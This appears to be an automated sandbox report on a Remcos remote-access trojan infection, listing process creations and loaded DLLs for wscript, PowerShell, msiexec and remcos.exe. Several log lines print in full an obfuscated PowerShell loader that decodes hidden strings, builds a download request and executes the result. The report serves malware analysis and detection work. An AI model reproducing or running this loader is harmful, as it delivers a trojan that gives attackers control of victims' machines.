AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknownProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: msi.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: version.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wintypes.dllJump to behavior
